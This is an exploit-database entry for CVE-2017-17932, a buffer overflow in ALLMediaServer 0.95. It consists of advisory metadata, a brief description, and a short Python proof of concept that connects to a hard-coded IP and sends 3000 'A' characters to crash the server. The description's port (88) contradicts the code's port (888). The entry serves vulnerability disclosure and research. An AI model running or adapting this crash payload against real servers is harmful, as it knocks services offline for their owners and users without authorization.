Lucene search

K
exploitpackAloyce J. MakalangaEXPLOITPACK:D9B7D5A849E117AF583D9D6F399A1194
HistoryDec 27, 2017 - 12:00 a.m.

ALLMediaServer 0.95 - Buffer Overflow (PoC)

2017-12-2700:00:00
Aloyce J. Makalanga
9

0.334 Low

EPSS

Percentile

97.1%

ALLMediaServer 0.95 - Buffer Overflow (PoC)

# Exploit Title: Buffer  overflow in ALLPlayer ALLMediaServer 0.95 and earlier
# CVE: CVE-2017-17932
# Date: 27-12-2017 
# Exploit Author: Aloyce J. Makalanga
# Contact: https://twitter.com/aloycemjr
# Vendor Homepage: http://www.allmediaserver.org/
# Category: webapps
# Attack Type: Remote
# Impact: Code execution and/or Denial of Service 



 
#1. Description
#
#A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 88. Te exploit this vulnerability, an attacker must connect to the server with a long-malicious string.
#
#   
#2. Proof of Concept
#
 

#!/usr/bin/python

#NOTE: I found this bug via patch-diffing and I had IDA Pro set up as my Just-In-Time debugger at the time of the crash but any debugger should work. 

def main():

   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

   s.connect(('192.168.205.131', 888))

   buffer = "A" * 3000


   s.send(buffer)

   s.close()


if __name__ == '__main__':
   import socket

   main()

0.334 Low

EPSS

Percentile

97.1%

Related for EXPLOITPACK:D9B7D5A849E117AF583D9D6F399A1194